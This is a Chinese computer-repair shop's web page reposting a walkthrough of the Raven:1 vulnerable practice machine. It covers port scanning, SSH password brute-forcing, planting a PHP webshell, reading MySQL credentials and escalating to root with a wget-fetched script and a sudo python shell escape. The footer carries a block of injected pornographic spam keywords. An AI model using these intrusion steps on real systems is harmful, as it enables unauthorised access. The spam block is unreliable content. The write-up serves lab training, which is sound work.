錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
滲透測試實戰-Raven:1靶機入侵

作者: 佚名  日期:2018-11-15 13:26:19   來源: 本站整理

 大家好!愛寫靶機滲透文章的我又來了,該靶機被設計者定義為初級-中級,最后小弟完成整個滲透的時候也的確是比較簡單的;但是中間設計者設計了一個坑,小弟在那里被困了好幾天,都塌喵的開始懷疑人生了。下面會介紹,本靶機設計者一共設置了4個flag,本次入侵也已拿到4個flag和root權限為止。
 
靶機安裝/下載
Raven:1靶機下載:https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtg靶機IP: 172.16.24.37

 
實戰
第一步老規矩探測ip:

已經知道了ip,下一步就是使用nmap探測靶機開放的端口了,如圖:

通過上面的端口探測可以看到,該靶機開放了多個端口,我們還是老規矩以80端口作為突破口

下一步進行目錄猜解,本次使用gobuster 工具完成

我們在 http://172.16.24.37/service.html 拿到了第一個flag,在源代碼262行處,如圖:

flag1{b9bbcb33e11b80be759c4e844862482d}
通過剛剛的目錄猜解,我在/vendor目錄下發現了 PHPMailerAutoload.php,通過搜索發現存在一個PHPmailer的任意命令執行漏洞,然后小弟就一頓操作一頓修改exp,

(注:這里的絕對路徑在http://172.16.24.37/vendor/PATH )

小弟還不死心,直接手動測試,如圖:

依然出錯,在這里小弟被卡了好幾天,一度懷疑是不是靶機設計者設計錯了,最后忘記是用哪款掃描器,掃描到了zip文件,地址:http://172.16.24.37/contact.zip ,下載來后通過查看源代碼發現,該源碼里寫入的地址是錯的,這也就說我一直沒法利用該漏洞的原因,如圖:

最后小弟把目光放在/wordpress 上,老規矩使用wpsan懟一波,如圖:

未發現可利用漏洞,但是出來2個賬戶“michael”、“steven”
下面我們加載這2個賬戶來破解其ssh密碼,各位也可以使用msf來完成
小弟這里使用hydra:

破解出來密碼:“michael”、“michael”
即能成功登陸ssh,

下一步就是拿flag了,flag2在 /var/www/ 目錄下,如圖:

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
下面為了演示方便,小弟上了一個php大馬在/wordpress目錄下,

下一步就是提權了,在/wordpress/wp_config.php 里拿到mysql的賬戶密碼,如圖:

mysql賬戶密碼為:“root”、“R@v3nSecurity”
到了這里肯定要小伙伴要問了,前面端口探測不是看到靶機沒開3306端口嗎?其實它只是為了防止外部訪問罷了,我們使用shell查看,即可知道,如圖:
下面肯定是通過mysql提權啊,我們使用php大馬來操作mysql,方便大家閱讀


拿到了flag3{afc01ab56b50591e7dccf93122770cd2}
小弟也在/tmp目錄下,上傳了一個提權輔助腳本,命令:
wget https://www.securitysift.com/download/linuxprivchecker.py

通過提權腳本我們可以看到,我們可以使用mysql來完成提權,該方法的提權具體操作,見代碼注釋處,如圖:

腳本地址:https://www.exploit-db.com/exploits/1518/
小弟這里使用另外一種方法提權,剛剛我們已經得到了另外一個賬戶“steven”的hash值,下一步我們破解這個hash
得到破解密碼:pink84
下面我們切換到steven賬戶

下一步輸入命令:sudo -l

可以看到python,可以直接繞過root,下面只需要輸入命令
sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

成功拿到flag和root_shell
 
總結
通過這篇文章小伙伴們應該也看到了,該靶機其實挺簡單的,但是小弟在前面被不知是設計者的故意挖坑還是失望留的坑,困了好幾天,一直無法突破。所以說小伙伴們以后在真實環境中如果碰到無法突破的點,可以先試著跳出來看看其他的是否有突破口吶?
最后祝大家生活愉快,感謝觀看!



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 无码国产色欲XXXX视频| 蜜芽亚洲av无码精品色午夜| 国产成人无码一区二区三区 | 亚洲精品无码成人片久久| 久久久久久久久免费看无码| 三上悠亚ssⅰn939无码播放| 久久无码中文字幕东京热| 无码精品久久一区二区三区| 无码午夜人妻一区二区三区不卡视频| 无码h黄肉3d动漫在线观看| 中文字幕无码第1页| 国模无码视频一区| 亚洲综合无码一区二区| 亚洲中文字幕无码专区| 亚洲av无码av在线播放| 亚洲∧v久久久无码精品| 久久久久久国产精品无码下载| 精品国产V无码大片在线看| HEYZO无码综合国产精品227| 中文无码一区二区不卡αv| 国产AV一区二区三区无码野战| 亚洲一级特黄无码片| 中文字幕无码视频手机免费看 | 日韩精品中文字幕无码一区| 国产精品成人无码久久久| 性无码一区二区三区在线观看| 午夜精品久久久久久久无码| 亚洲国产精品无码久久98| 人妻无码αv中文字幕久久琪琪布 人妻无码第一区二区三区 | 国产免费久久久久久无码| 2019亚洲午夜无码天堂| 无码人妻少妇色欲AV一区二区| 久久人妻少妇嫩草AV无码蜜桃| 丰满少妇被猛烈进入无码| 亚洲精品无码一区二区| 日韩成人无码一区二区三区| 性色av极品无码专区亚洲| 亚洲久热无码av中文字幕| 亚洲精品无码少妇30P| 无码国产精品一区二区免费| 中文有码无码人妻在线|